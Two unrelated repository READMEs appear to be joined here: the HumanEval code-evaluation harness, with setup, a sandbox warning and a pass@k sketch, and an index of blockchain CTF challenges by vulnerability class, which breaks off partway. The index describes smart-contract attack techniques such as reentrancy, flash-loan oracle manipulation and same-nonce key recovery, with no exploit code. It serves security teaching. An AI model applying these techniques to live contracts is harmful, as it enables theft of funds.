This is an evaluation harness for the HumanEval problem-solving dataset described in the paper "[Evaluating Large Language Models Trained on Code](https://arxiv.org/abs/2107.03374)".

## Installation

Make sure to use Python 3.7 or later:

```
conda create -n codex python=3.7
conda activate codex
```

Check out and install this repository:

```
git clone https://github.com/openai/human-eval
pip install -e human-eval
```

## Usage

**This program exists to run untrusted model-generated code. Users are strongly encouraged not to do so outside of a robust security sandbox. The [execution call](https://github.com/openai/human-eval/blob/master/human_eval/execution.py#L48-L58) in `execution.py` is deliberately commented out to ensure users read this disclaimer before running code in a potentially unsafe manner. See the comment in `execution.py` for more information and instructions.**

After following the above instructions to enable execution, generate samples and save them in the following JSON Lines (jsonl) format, where each sample is formatted into a single line like so:

```
{"task_id": "Corresponding HumanEval task ID", "completion": "Completion only without the prompt"}
```

We provide `example_problem.jsonl` and `example_solutions.jsonl` under `data` to illustrate the format and help with debugging.

Here is nearly functional example code (you just have to provide `generate_one_completion` to make it work) that saves generated completions to `samples.jsonl`:

```python
from human_eval.data import write_jsonl, read_problems

problems = read_problems()

num_samples_per_task = 200
samples = [
    dict(task_id=task_id, completion=generate_one_completion(problems[task_id]["prompt"]))
    for task_id in problems
    for _ in range(num_samples_per_task)
]
write_jsonl("samples.jsonl", samples)
```

To evaluate the samples, run:

```
$ evaluate_functional_correctness samples.jsonl
Reading samples...
32800it [00:01, 23787.50it/s]
Running test suites...
100%|...| 32800/32800 [16:11<00:00, 33.76it/s]
Writing results to samples.jsonl_results.jsonl...
100%|...| 32800/32800 [00:00<00:00, 42876.84it/s]
{'pass@1': ..., 'pass@10': ..., 'pass@100': ...}
```

This script provides more fine-grained information in a new file ending in `<input_path>_results.jsonl`. Each row now contains whether the completion `passed` along with the execution `result`, which is one of "passed", "timed out", or "failed".

As a quick sanity check, the example samples should yield 0.5 pass@1:

```
$ evaluate_functional_correctness data/example_samples.jsonl --problem_file=data/example_problem.jsonl
Reading samples...
6it [00:00, 3397.11it/s]
Running example suites...
100%|...| 6/6 [00:03<00:00, 1.96it/s]
Writing results to data/example_samples.jsonl_results.jsonl...
100%|...| 6/6 [00:00<00:00, 6148.50it/s]
{'pass@1': 0.4999999999999999}
```

Because there is no unbiased way of estimating pass@k when there are fewer samples than k, the script does not evaluate pass@k for these cases. To evaluate with other k values, pass `--k=<comma-separated-values-here>`. For other options, see:

```
$ evaluate_functional_correctness --help
```

However, we recommend that you use the default values for the rest.

## Known Issues

While evaluation uses very little memory, you might see the following error message when the system is running out of RAM. Since this may cause some correct programs to fail, we recommend that you free some memory and try again:

```
malloc: can't allocate region
```

## Citation

Please cite using the following BibTeX entry:

```
@article{chen2021codex,
  title={Evaluating Large Language Models Trained on Code},
  author={Mark Chen and Jerry Tworek and Heewoo Jun and Qiming Yuan and Henrique Ponde de Oliveira Pinto and Jared Kaplan and Harri Edwards and Yuri Burda and Nicholas Joseph and Greg Brockman and Alex Ray and Raul Puri and Gretchen Krueger and Michael Petrov and Heidy Khlaaf and Girish Sastry and Pamela Mishkin and Brooke Chan and Scott Gray and Nick Ryder and Mikhail Pavlov and Alethea Power and Lukasz Kaiser and Mohammad Bavarian and Clemens Winter and Philippe Tillet and Felipe Petroski Such and Dave Cummings and Matthias Plappert and Fotios Chantzis and Elizabeth Barnes and Ariel Herbert-Voss and William Hebgen Guss and Alex Nichol and Alex Paino and Nikolas Tezak and Jie Tang and Igor Babuschkin and Suchir Balaji and Shantanu Jain and William Saunders and Christopher Hesse and Andrew N. Carr and Jan Leike and Josh Achiam and Vedant Misra and Evan Morikawa and Alec Radford and Matthew Knight and Miles Brundage and Mira Murati and Katie Mayer and Peter Welinder and Bob McGrew and Dario Amodei and Sam McCandlish and Ilya Sutskever and Wojciech Zaremba},
  year={2021},
  eprint={2107.03374},
  archivePrefix={arXiv},
  primaryClass={cs.LG}
}
```
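The README notes that pass@k is only estimated when at least k samples are available, because an unbiased estimator needs n ≥ k. For intuition, here is a minimal sketch of the unbiased pass@k estimator from the paper, 1 - C(n-c, k)/C(n, k), where n is the number of samples drawn for a task and c the number that passed. This is an illustration of the formula, not the library's own implementation (which uses a numerically stable product form).

```python
from math import comb

def pass_at_k(n: int, c: int, k: int) -> float:
    """Unbiased pass@k estimate: probability that at least one of k
    randomly chosen samples (out of n, of which c passed) is correct."""
    if n - c < k:
        # every size-k subset must contain a passing sample
        return 1.0
    return 1.0 - comb(n - c, k) / comb(n, k)

# Matches the sanity check above: 6 example samples, 3 passing -> pass@1 = 0.5
print(pass_at_k(6, 3, 1))
```

Averaging this quantity over all tasks gives the reported pass@k score.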
ctf-blockchain
# CTF Blockchain Challenges

This repository collects blockchain challenges in CTFs and wargames. These challenges are categorized by topic, not by difficulty or recommendation. There are also my writeups and exploits for some challenges (e.g. [Paradigm CTF 2022](src/ParadigmCTF2022)).

If there are any incorrect descriptions, I would appreciate it if you could let me know via an issue or a PR.

## Table of Contents

- [Ethereum](#ethereum)
  - [Contract Basics](#contract-basics)
  - [EVM Puzzles](#evm-puzzles)
  - [Misuse of `tx.origin`](#misuse-of-txorigin)
  - [Weak Sources of Randomness from Chain Attributes](#weak-sources-of-randomness-from-chain-attributes)
  - [ERC-20 Basics](#erc-20-basics)
  - [Storage Overwrite by `delegatecall`](#storage-overwrite-by-delegatecall)
  - [Context Mismatch in `delegatecall`](#context-mismatch-in-delegatecall)
  - [Integer Overflow](#integer-overflow)
  - [Non-Executable Ether Transfers to Contracts](#non-executable-ether-transfers-to-contracts)
  - [Forced Ether Transfers to Contracts via `selfdestruct`](#forced-ether-transfers-to-contracts-via-selfdestruct)
  - [Large Gas Consumption by Contract Callees](#large-gas-consumption-by-contract-callees)
  - [Forgetting to Set `view`/`pure` to Interface and Abstract Contract Functions](#forgetting-to-set-viewpure-to-interface-and-abstract-contract-functions)
  - [`view` Functions That Do Not Always Return Same Values](#view-functions-that-do-not-always-return-same-values)
  - [Mistakes in Setting `storage` and `memory`](#mistakes-in-setting-storage-and-memory)
  - [Tracing Transactions](#tracing-transactions)
  - [Reversing States](#reversing-states)
  - [Reversing Transactions](#reversing-transactions)
  - [Reversing EVM Bytecodes](#reversing-evm-bytecodes)
  - [EVM Bytecode Golf](#evm-bytecode-golf)
  - [Jump-Oriented Programming](#jump-oriented-programming)
  - [Gas Optimization](#gas-optimization)
  - [Collisions When Using `abi.encodePacked` with Variable-Length Arguments](#collisions-when-using-abiencodepacked-with-variable-length-arguments)
  - [Bypassing Verifications with Zero-Iteration Loops](#bypassing-verifications-with-zero-iteration-loops)
  - [Reentrancy Attacks](#reentrancy-attacks)
  - [Flash Loan Basics](#flash-loan-basics)
  - [Governance Attacks by Executing Flash Loans During Snapshots](#governance-attacks-by-executing-flash-loans-during-snapshots)
  - [Bypassing Repayments of Push-Architecture Flash Loans](#bypassing-repayments-of-push-architecture-flash-loans)
  - [Bugs in AMM Price Calculation Algorithm](#bugs-in-amm-price-calculation-algorithm)
  - [Attacks Using Custom Tokens](#attacks-using-custom-tokens)
  - [Oracle Manipulation Attacks without Flash Loans](#oracle-manipulation-attacks-without-flash-loans)
  - [Oracle Manipulation Attacks with Flash Loans](#oracle-manipulation-attacks-with-flash-loans)
  - [Sandwich Attacks](#sandwich-attacks)
  - [Recoveries of Private Keys by Same-Nonce Attacks](#recoveries-of-private-keys-by-same-nonce-attacks)
  - [Brute-Forcing Addresses](#brute-forcing-addresses)
  - [Recoveries of Public Keys](#recoveries-of-public-keys)
  - [Encryption and Decryption in secp256k1](#encryption-and-decryption-in-secp256k1)
  - [Bypassing Bots and Taking ERC-20 Tokens Owned by Wallets with Known Private Keys](#bypassing-bots-and-taking-erc-20-tokens-owned-by-wallets-with-known-private-keys)
  - [Claimable Intermediate Nodes of Merkle Trees](#claimable-intermediate-nodes-of-merkle-trees)
  - [Precompiled Contracts](#precompiled-contracts)
  - [Faking Errors](#faking-errors)
  - [Foundry Cheatcodes](#foundry-cheatcodes)
  - [Front-Running](#front-running)
  - [Back-Running](#back-running)
  - [Head Overflow Bugs in Calldata Tuple ABI-Reencoding (Solidity < 0.8.16)](#head-overflow-bugs-in-calldata-tuple-abi-reencoding-solidity--0816)
  - [Overwriting Storage Slots via Local Storage Variables (Solidity < 0.8.1)](#overwriting-storage-slots-via-local-storage-variables-solidity--081)
  - [Overwriting Arbitrary Storage Slots by Setting Array Lengths to 2^256-1 (Solidity < 0.6.0)](#overwriting-arbitrary-storage-slots-by-setting-array-lengths-to-2256-1-solidity--060)
  - [Constructors That Are Just Functions by Typos (Solidity < 0.5.0)](#constructors-that-are-just-functions-by-typos-solidity--050)
  - [Overwriting Storage Slots via Uninitialized Storage Pointers (Solidity < 0.5.0)](#overwriting-storage-slots-via-uninitialized-storage-pointers-solidity--050)
  - [Other Ad-Hoc Vulnerabilities and Methods](#other-ad-hoc-vulnerabilities-and-methods)
- [Bitcoin](#bitcoin)
  - [Bitcoin Basics](#bitcoin-basics)
  - [Recoveries of Private Keys by Same-Nonce Attacks](#recoveries-of-private-keys-by-same-nonce-attacks-1)
  - [Bypassing PoW of Other Applications Using Bitcoin's PoW Database](#bypassing-pow-of-other-applications-using-bitcoins-pow-database)
- [Cairo](#cairo)
- [Solana](#solana)
- [Move](#move)
- [Other Blockchain-Related](#other-blockchain-related)

## Ethereum

Note:
- If an attack is only valid for a particular version of Solidity and not for the latest version, the version is noted at the end of the heading.
- To avoid notation fluctuations, EVM terms are avoided as much as possible, and Solidity terms are used.

### Contract Basics

These challenges can be solved if you know the basic mechanics of Ethereum, the basic language specification of [Solidity](https://docs.soliditylang.org/en/latest/), and the basic operation of contracts.

|Challenge|Note, Keywords|
|-|-|
|[Capture The Ether: Deploy a contract](src/CaptureTheEther)|faucet, wallet|
|[Capture The Ether: Call me](src/CaptureTheEther)|contract call|
|[Capture The Ether: Choose a nickname](src/CaptureTheEther)|contract call|
|[Capture The Ether: Guess the number](src/CaptureTheEther)|contract call|
|[Capture The Ether: Guess the secret number](src/CaptureTheEther)|`keccak256`|
|[Ethernaut: 0. Hello Ethernaut](src/Ethernaut)|contract call, ABI|
|[Ethernaut: 1. Fallback](src/Ethernaut)|receive Ether function|
|[Paradigm CTF 2021: Hello](src/ParadigmCTF2021)|contract call|
|[0x41414141 CTF: sanity-check](src/0x41414141CTF)|contract call|
|[Paradigm CTF 2022: RANDOM](src/ParadigmCTF2022)|contract call|
|[DownUnderCTF 2022: Solve Me](src/DownUnderCTF2022)||

### EVM Puzzles

Puzzle challenges that can be solved by understanding the EVM specifications. No vulnerabilities are used to solve these challenges.

|Challenge|Note, Keywords|
|-|-|
|[Capture The Ether: Guess the new number](src/CaptureTheEther)|`block.number`, `block.timestamp`|
|[Capture The Ether: Predict the block hash](src/CaptureTheEther)|`blockhash`|
|[Ethernaut: 13. Gatekeeper One](src/Ethernaut)|`msg.sender != tx.origin`, `gasleft() % 8191 == 0`, type conversion|
|[Ethernaut: 14. Gatekeeper Two](src/Ethernaut)|`msg.sender != tx.origin`, `extcodesize` is 0|
|Cipher Shastra: Minion|`msg.sender != tx.origin`, `extcodesize` is 0, `block.timestamp`|
|SECCON Beginners CTF 2020: C4B|`block.number`|
|[Paradigm CTF 2021: Babysandbox](src/ParadigmCTF2021/BabySandbox)|`staticcall`, `call`, `delegatecall`, `extcodesize` is 0|
|Paradigm CTF 2021: Lockbox|`ecrecover`, `abi.encodePacked`, `msg.data.length`|
|[EthernautDAO: 6. (No Name)](src/EthernautDAO/NoName)|`block.number`, gas price war|
|[fvictorio's EVM puzzles](src/FvictorioEVMPuzzles)||
|[Huff Challenge: Challenge #3](src/HuffChallenge)||
|[Paradigm CTF 2022: LOCKBOX2](src/ParadigmCTF2022)||
|[Paradigm CTF 2022: SOURCECODE](src/ParadigmCTF2022)|quine|
|[Numen Cyber CTF 2023: LittleMoney](src/NumenCTF)|function pointer|
|[Numen Cyber CTF 2023: ASSLOT](src/NumenCTF)|`staticcall` that returns different values|

### Misuse of `tx.origin`

`tx.origin` refers to the address of the transaction publisher and should not be used as the address of the contract caller (`msg.sender`).

|Challenge|Note, Keywords|
|-|-|
|[Ethernaut: 4. Telephone](src/Ethernaut)||

### Weak Sources of Randomness from Chain Attributes

Since contract bytecodes are publicly available, it is easy to predict pseudorandom numbers whose generation is completed on-chain (using only states, not off-chain data). It is equivalent to having all the parameters of a pseudorandom number generator exposed. If you want to use random numbers that are unpredictable to anyone, use a decentralized oracle with a random number function, for example [Chainlink VRF](https://docs.chain.link/docs/chainlink-vrf), which implements a verifiable random function (VRF).

|Challenge|Note, Keywords|
|-|-|
|[Capture The Ether: Predict the future](src/CaptureTheEther)||
|[Ethernaut: 3. Coin Flip](src/Ethernaut)||
|[DownUnderCTF 2022: Crypto Casino](src/DownUnderCTF2022)||

### ERC-20 Basics

These challenges can be solved with an understanding of the [ERC-20 token standard](https://eips.ethereum.org/EIPS/eip-20).

|Challenge|Note, Keywords|
|-|-|
|[Ethernaut: 15. Naught Coin](src/Ethernaut)|`transfer`, `approve`, `transferFrom`|
|[Paradigm CTF 2021: Secure](src/ParadigmCTF2021)|WETH|
|[DeFi Security Summit Stanford: VToken](src/DefiSecuritySummitStanford)||

### Storage Overwrite by `delegatecall`

`delegatecall` is a potential source of vulnerability because the storage of the `delegatecall` caller contract can be overwritten by the called contract.

|Challenge|Note, Keywords|
|-|-|
|[Ethernaut: 6. Delegation](src/Ethernaut)||
|[Ethernaut: 16. Preservation](src/Ethernaut)||
|[Ethernaut: 24. Puzzle Wallet](src/Ethernaut)|proxy contract|
|[Ethernaut: 25. Motorbike](src/Ethernaut)|proxy contract, [EIP-1967: Standard Proxy Storage Slots](https://eips.ethereum.org/EIPS/eip-1967)|
|[DeFi Security Summit Stanford: InsecureumLenderPool](src/DefiSecuritySummitStanford)|flash loan|
|[QuillCTF 2023: D3l3g4t3](src/QuillCTF2022/D3l3g4t3)||
|[Numen Cyber CTF 2023: Counter](src/NumenCTF)|writing EVM code|

### Context Mismatch in `delegatecall`

Contracts called by `delegatecall` are executed in the context of the `delegatecall` caller contract. If a function does not carefully consider the context, a bug will be created.

|Challenge|Note, Keywords|
|-|-|
|[EthernautDAO: 3. CarMarket](src/EthernautDAO/CarMarket)|non-use of `address(this)`|

### Integer Overflow

For example, subtracting 1 from the value of a variable of `uint` type when the value is 0 causes an arithmetic overflow. Arithmetic overflow has been detected and reverted since Solidity v0.8.0. Contracts written in earlier versions can be checked by using the [SafeMath library](https://github.com/OpenZeppelin/openzeppelin-contracts/blob/release-v3.4/contracts/math/SafeMath.sol).

|Challenge|Note, Keywords|
|-|-|
|[Capture The Ether: Token sale](src/CaptureTheEther)|multiplication|
|[Capture The Ether: Token whale](src/CaptureTheEther)|subtraction|
|[Ethernaut: 5. Token](src/Ethernaut)|subtraction|

### Non-Executable Ether Transfers to Contracts

Do not create a contract on the assumption that a normal Ether transfer (`send` or `transfer`) can always be executed. If the destination is a contract and it has no receive Ether function or payable fallback function, Ether cannot be transferred. However, instead of the normal transfer functions, the `selfdestruct` described below can be used to force such a contract to receive Ether.

|Challenge|Note, Keywords|
|-|-|
|[Ethernaut: 9. King](src/Ethernaut)||
|[Project SEKAI CTF 2022: Random Song](src/ProjectSekaiCTF2022/RandomSong)|Chainlink VRF|

### Forced Ether Transfers to Contracts via `selfdestruct`

Even if a contract has neither a receive Ether function nor a payable fallback function, it is not guaranteed that it will not receive Ether. When a contract executes `selfdestruct`, it can transfer its Ether to another contract or EOA, and this `selfdestruct` transfer can be forced even if the destination contract has no receive Ether function and no payable fallback function. If the application is built on the assumption that its Ether balance is 0, this could be a bug.

|Challenge|Note, Keywords|
|-|-|
|[Capture The Ether: Retirement fund](src/CaptureTheEther)|integer overflow|
|[Ethernaut: 7. Force](src/Ethernaut)||

### Large Gas Consumption by Contract Callees

A large amount of gas can be consumed by loops and recursion in `call`, and there may not be enough gas for the rest of the process. Until Solidity v0.8.0, zero division and `assert(false)` could consume a lot of gas.

|Challenge|Note, Keywords|
|-|-|
|[Ethernaut: 20. Denial](src/Ethernaut)||

### Forgetting to Set `view`/`pure` to Interface and Abstract Contract Functions

If you forget to set `view` or `pure` for a function and design your application under the assumption that the state will not change, it will be a bug.

|Challenge|Note, Keywords|
|-|-|
|[Ethernaut: 11. Elevator](src/Ethernaut)||

### `view` Functions That Do Not Always Return Same Values

Since `view` functions can read state, they can be conditionally branched based on state and do not necessarily return the same value.

|Challenge|Note, Keywords|
|-|-|
|[Ethernaut: 21. Shop](src/Ethernaut)||

### Mistakes in Setting `storage` and `memory`

If `storage` and `memory` are not set properly, old values may be referenced, or overwriting may not occur, resulting in vulnerability.

|Challenge|Note, Keywords|
|-|-|
|N1CTF 2021: BabyDefi|[Cover Protocol infinite minting](https://coverprotocol.medium.com/12-28-post-mortem-34c5f9f718d4), flash loan|

### Tracing Transactions

Various information can be obtained just by following the flow of transaction processing. Blockchain explorers such as Etherscan are useful.

|Challenge|Note, Keywords|
|-|-|
|[Ethernaut: 17. Recovery](src/Ethernaut)|loss of deployed contract address|

### Reversing States

Since the state and the bytecodes of contracts are public, all variables, including private variables, are readable. Private variables are only guaranteed not to be directly readable by other contracts; we, as entities outside the blockchain, can read them.

|Challenge|Note, Keywords|
|-|-|
|[Capture The Ether: Guess the random number](src/CaptureTheEther)||
|[Ethernaut: 8. Vault](src/Ethernaut)||
|[Ethernaut: 12. Privacy](src/Ethernaut)||
|Cipher Shastra: Sherlock||
|[0x41414141 CTF: secure enclave](src/0x41414141CTF)|log, storage|
|[EthernautDAO: 1. PrivateData](src/EthernautDAO/PrivateData)||

### Reversing Transactions

Reversing the contents of a transaction, or how the state has been changed by the transaction.

|Challenge|Note, Keywords|
|-|-|
|[DarkCTF: Secret Of The Contract](src/DarkCTF)||
|[DownUnderCTF 2022: Secret and Ephemeral](src/DownUnderCTF2022)||

### Reversing EVM Bytecodes

Reversing a contract for which code is not given in whole or in part. Use a decompiler (e.g. [heimdall](https://github.com/Jon-Becker/heimdall-rs), [Panoramix](https://github.com/eveem-org/panoramix)) and a disassembler (e.g. [ethersplay](https://github.com/crytic/ethersplay)).

|Challenge|Note, Keywords|
|-|-|
|Incognito 2.0: Ez|keep in plain text|
|[0x41414141 CTF: crackme.sol](src/0x41414141CTF)|decompile|
|[0x41414141 CTF: Crypto Casino](src/0x41414141CTF)|bypass condition check|
|Paradigm CTF 2021: Babyrev||
|34C3 CTF: Chaingang||
|Blaze CTF 2018: Smart Contract||
|DEF CON CTF Qualifier 2018: SAG||
|pbctf 2020: pbcoin||
|Paradigm CTF 2022: STEALING-SATS||
|Paradigm CTF 2022: ELECTRIC-SHEEP||
|Paradigm CTF 2022: FUN REVERSING CHALLENGE||
|[DownUnderCTF 2022: EVM Vault Mechanism](src/DownUnderCTF2022)||
|[EKOPARTY CTF 2022: Byte](src/EkopartyCTF2022)|stack tracing|
|[EKOPARTY CTF 2022: SmartRev](src/EkopartyCTF2022)|memory tracing|
|[Numen Cyber CTF 2023: HEXP](src/NumenCTF)|previous block hash, gas price, 2^24|

### EVM Bytecode Golf

These challenges have a limit on the length of the bytecode to be created.

|Challenge|Note, Keywords|
|-|-|
|[Ethernaut: 18. MagicNumber](src/Ethernaut)||
|[Paradigm CTF 2021: Rever](src/ParadigmCTF2021/Rever)|palindrome detection; in addition, the code that inverts the bytecode must also be able to detect palindromes|
|[Huff Challenge: Challenge #1](src/HuffChallenge)||

### Jump-Oriented Programming

Jump-oriented programming (JOP).

|Challenge|Note, Keywords|
|-|-|
|[SECCON CTF 2023 Quals: Tokyo Payload](https://github.com/minaminao/tokyo-payload)||
|Paradigm CTF 2021: JOP||
|Real World CTF 3rd: Re:Montagy||

### Gas Optimization

These challenges have a limit on the gas to be consumed.

|Challenge|Note, Keywords|
|-|-|
|[Huff Challenge: Challenge #2](src/HuffChallenge)||

### Collisions When Using `abi.encodePacked` with Variable-Length Arguments

|Challenge|Note, Keywords|
|-|-|
|[SEETF 2023: Operation Feathered Fortune Fiasco](src/SEETF2023)||

### Bypassing Verifications with Zero-Iteration Loops

|Challenge|Note, Keywords|
|-|-|
|[SEETF 2023: Murky SEEPass](src/SEETF2023)|array length, Merkle proof|

### Reentrancy Attacks

If a function of contract A contains an interaction with another contract B, or an Ether transfer to B, control is temporarily transferred to B. Since B can call A while it holds this control, it will be a bug if the design is based on the assumption that A is not called in the middle of the execution of that function. For example, suppose B executes the withdraw function to withdraw Ether deposited in A. The Ether transfer hands control to B, and during the withdraw function B executes A's withdraw function again. Even if the withdraw function is designed to prevent withdrawal of more than the limit when it is simply called twice, the limit check may be bypassed when the withdraw function is re-entered in the middle of its own execution. To prevent reentrancy attacks, use the checks-effects-interactions pattern.

|Challenge|Note, Keywords|
|-|-|
|[Capture The Ether: Token bank](src/CaptureTheEther)|ERC-223, `tokenFallback`|
|[Ethernaut: 10. Re-entrancy](src/Ethernaut)|`call`|
|Paradigm CTF 2021: Yield Aggregator||
|HTB University CTF 2020 Quals: moneyHeist||
|[EthernautDAO: 4. VendingMachine](src/EthernautDAO/VendingMachine)|`call`|
|[DeFi Security Summit Stanford: InsecureDexLP](src/DefiSecuritySummitStanford)|ERC-223, `tokenFallback`|
|[MapleCTF 2022: maplebacoin](src/MapleCTF)||
|[QuillCTF 2023: SafeNFT](src/QuillCTF2022/SafeNFT)|ERC-721, `safeMint`|
|[Numen Cyber CTF 2023: SimpleCall](src/NumenCTF)|`call`|
|[SEETF 2023: PigeonBank](src/SEETF2023)||
|[Project SEKAI CTF 2023: Re:Remix](src/ProjectSekaiCTF2023)|read-only reentrancy|

### Flash Loan Basics

Flash loans are uncollateralised loans that allow the borrowing of an asset, as long as the borrowed assets are returned before the end of the transaction. The borrower can deal with the borrowed assets any way they want within the transaction. By making large asset moves, attacks can be made to snatch funds from DeFi applications or to gain large amounts of votes for participation in governance. A solution to attacks that use flash loans to corrupt oracle values is to use a decentralized oracle.

|Challenge|Note, Keywords|
|-|-|
|Damn Vulnerable DeFi: 1. Unstoppable|Simple flash loan with a single token. Failure to send the token directly.|
|Damn Vulnerable DeFi: 2. Naive receiver|The `flashLoan` function can specify a borrower, but the receiver side does not authenticate the tx sender, so the receiver's funds can be drained as a fee.|
|Damn Vulnerable DeFi: 3. Truster|The target of a `call` is made into the token, and the token can be taken by approving it to oneself.|
|Damn Vulnerable DeFi: 4. Side entrance|Flash loan that allows each user to make a deposit and a withdrawal. The deposit can be executed at no cost at the time of the flash loan.|

### Governance Attacks by Executing Flash Loans During Snapshots

If an algorithm distributes some kind of rights using the token balance at the time of a snapshot, and if a malicious user transaction can trigger a snapshot, a flash loan can be used to obtain massive rights. A period of time to lock the token will avoid this attack.

|Challenge|Note, Keywords|
|-|-|
|Damn Vulnerable DeFi: 5. The rewarder|Get reward tokens based on the deposited token balance.|
|Damn Vulnerable DeFi: 6. Selfie|Get voting power in governance based on the deposited token balance.|

### Bypassing Repayments of Push-Architecture Flash Loans

There are two architectures of flash loans: push and pull, with push architectures represented by Uniswap and Aave v1, and pull architectures by Aave v2 and dYdX. The flash loan proposed in [EIP-3156: Flash Loans](https://eips.ethereum.org/EIPS/eip-3156) is a pull architecture.

|Challenge|Note, Keywords|
|-|-|
|Paradigm CTF 2021: Upgrade|bypass using the lending functionality implemented in the token|

### Bugs in AMM Price Calculation Algorithm

A bug in an automated market maker (AMM) price calculation algorithm allows a simple combination of trades to drain funds.

|Challenge|Note, Keywords|
|-|-|
|[Ethernaut: 22. Dex](src/Ethernaut)||

### Attacks Using Custom Tokens

The ability of a protocol to use arbitrary tokens is not in itself a bad thing, but it can be an attack vector. In addition, bugs in a whitelist design that assumes arbitrary tokens are not available could cause funds to drain.

|Challenge|Note, Keywords|
|-|-|
|[Ethernaut: 23. Dex Two](src/Ethernaut)||

### Oracle Manipulation Attacks without Flash Loans

Corrupt the value of an oracle and drain the funds of applications that refer to that oracle.

|Challenge|Note, Keywords|
|-|-|
|Paradigm CTF 2021: Broker|Distort Uniswap prices and liquidate positions on lending platforms that reference those prices.|
|Damn Vulnerable DeFi: 7. Compromised|off-chain private key leak, oracle manipulation|

### Oracle Manipulation Attacks with Flash Loans

The use of flash loans distorts the value of an oracle and drains the funds of the protocols that reference that oracle. The ability to move large amounts of funds through a flash loan makes it easy to distort the oracle and cause more damage.

|Challenge|Note, Keywords|
|-|-|
|Damn Vulnerable DeFi: 8. Puppet|Distort the price of Uniswap v1 and leak tokens from a lending platform that references that price.|
|[DeFi Security Summit Stanford: BorrowSystemInsecureOracle](src/DefiSecuritySummitStanford)|lending protocol|

### Sandwich Attacks

For example, if there is a transaction by another party to sell token A and buy B, the attacker can put in a transaction to sell A and buy B before that transaction, and later put in a transaction to sell the same amount of B and buy A, thereby ultimately increasing the amount of A at a profit. In general, such revenue earned by selecting, inserting, and reordering transactions contained in a block generated by a miner is referred to as miner extractable value (MEV); recently, it is also called maximal extractable value.

|Challenge|Note, Keywords|
|-|-|
|[Paradigm CTF 2021: Farmer](src/ParadigmCTF2021)|Sandwich the trade from COMP to WETH to DAI.|

### Recoveries of Private Keys by Same-Nonce Attacks

In general, a same-nonce attack is possible when the same nonce is used for different messages in the elliptic curve DSA (ECDSA), and the secret key can be calculated. In Ethereum, this attack is feasible if the nonces used to sign transactions are the same.

|Challenge|Note, Keywords|
|-|-|
|[Capture The Ether: Account Takeover](src/CaptureTheEther)||
|[Paradigm CTF 2021: Babycrypto](src/ParadigmCTF2021)||
|[MetaTrust CTF: ECDSA](src/MetaTrustCTF/ECDSA)||

### Brute-Forcing Addresses

Brute force can make a part of an address a specific value.

|Challenge|Note, Keywords|
|-|-|
|[Capture The Ether: Fuzzy identity](src/CaptureTheEther)|28 bits, CREATE2|
|[Numen Cyber CTF 2023: Exist](src/NumenCTF)|16 bits|

### Recoveries of Public Keys

An address is a public key run through a keccak256 hash, and the public key cannot be recovered from the address. However, if even one transaction has been sent, the public key can be back-calculated from it. Specifically, it can be recovered from the Recursive Length Prefix (RLP)-encoded data `(nonce, gas_price, gas, to, value, data, chain_id, 0, 0)` and the signature `(v, r, s)`.

|Challenge|Note, Keywords|
|-|-|
|[Capture The Ether: Public Key](src/CaptureTheEther)|RLP, ECDSA|

### Encryption and Decryption in secp256k1

|Challenge|Note, Keywords|
|-|-|
|[0x41414141 CTF: Rich Club](src/0x41414141CTF)|DEX, flash loan|

### Bypassing Bots and Taking ERC-20 Tokens Owned by Wallets with Known Private Keys

If a wallet with a known private key holds an ERC-20 token but no Ether, it is usually necessary to first send Ether to the wallet and then transfer the ERC-20 token out. However, if a bot is running that immediately takes any Ether sent to the wallet, the Ether will be stolen when it is simply sent. In this situation, we can use [Flashbots](https://docs.flashbots.net/) bundled transactions, or just `permit` and `transferFrom` if the token is [EIP-2612: permit](https://eips.ethereum.org/EIPS/eip-2612)-friendly.

|Challenge|Note, Keywords|
|-|-|
|[EthernautDAO: 5. EthernautDAOToken](src/EthernautDAO/EthernautDAOToken)||

### Claimable Intermediate Nodes of Merkle Trees

|Challenge|Note, Keywords|
|-|-|
|[Paradigm CTF 2022: MERKLEDROP](src/ParadigmCTF2022)||

### Precompiled Contracts

|Challenge|Note, Keywords|
|-|-|
|[Paradigm CTF 2022: VANITY](src/ParadigmCTF2022)||

### Faking Errors

|Challenge|Note, Keywords|
|-|-|
|[Ethernaut: 27. Good Samaritan](src/Ethernaut)||

### Foundry Cheatcodes

|Challenge|Note, Keywords|
|-|-|
|[Paradigm CTF 2022: TRAPDOOOR](src/ParadigmCTF2022)||
|Paradigm CTF 2022: TRAPDOOOOR||

### Front-Running

|Challenge|Note, Keywords|
|-|-|
|[DownUnderCTF 2022: Private Log](src/DownUnderCTF2022)||

### Back-Running

MEV-Share can be used to create bundled transactions to back-run.

|Challenge|Note, Keywords|
|-|-|
|[MEV-Share CTF: MevShareCTFSimple 1](src/MevShareCTF)||
|[MEV-Share CTF: MevShareCTFSimple 2](src/MevShareCTF)||
|[MEV-Share CTF: MevShareCTFSimple 3](src/MevShareCTF)||
|[MEV-Share CTF: MevShareCTFSimple 4](src/MevShareCTF)||
|[MEV-Share CTF: MevShareCTFMagicNumberV1](src/MevShareCTF)||
|[MEV-Share CTF: MevShareCTFMagicNumberV2](src/MevShareCTF)||
|[MEV-Share CTF: MevShareCTFMagicNumberV3](src/MevShareCTF)||
|[MEV-Share CTF: MevShareCTFNewContract (address)](src/MevShareCTF)||
|[MEV-Share CTF: MevShareCTFNewContract (salt)](src/MevShareCTF)|CREATE2|

### Head Overflow Bugs in Calldata Tuple ABI-Reencoding (Solidity < 0.8.16)

See https://blog.soliditylang.org/2022/08/08/calldata-tuple-reencoding-head-overflow-bug/.

|Challenge|Note, Keywords|
|-|-|
|[0CTF 2022: TCTF NFT Market](src/0CTF2022/TctfNFTMarket)||
|[Numen Cyber CTF 2023: Wallet](src/NumenCTF)|illegal `v` in `ecrecover`|

### Overwriting Storage Slots via Local Storage Variables (Solidity < 0.8.1)

In `Foo storage foo;`, the local variable `foo` points to slot 0.

|Challenge|Note, Keywords|
|-|-|
|[Capture The Ether: Donation](src/CaptureTheEther)||

### Overwriting Arbitrary Storage Slots by Setting Array Lengths to 2^256-1 (Solidity < 0.6.0)

For example, any storage variable can be overwritten by negatively arithmetic-overflowing the length of an array to 2^256-1 (it need not be due to overflow). The `length` property has been read-only since v0.6.0.

|Challenge|Note, Keywords|
|-|-|
|[Capture The Ether: Mapping](src/CaptureTheEther)||
|[Ethernaut: 19. Alien Codex](src/Ethernaut)||
|Paradigm CTF 2021: Bank||

### Constructors That Are Just Functions by Typos (Solidity < 0.5.0)

In versions before v0.4.22, a constructor was defined as a function with the same name as the contract, so a typo in the constructor name could cause it to become just a function, resulting in a bug. Since v0.5.0, this specification has been removed and the `constructor` keyword must be used.

|Challenge|Note, Keywords|
|-|-|
|[Capture The Ether: Assume ownership](src/CaptureTheEther)||
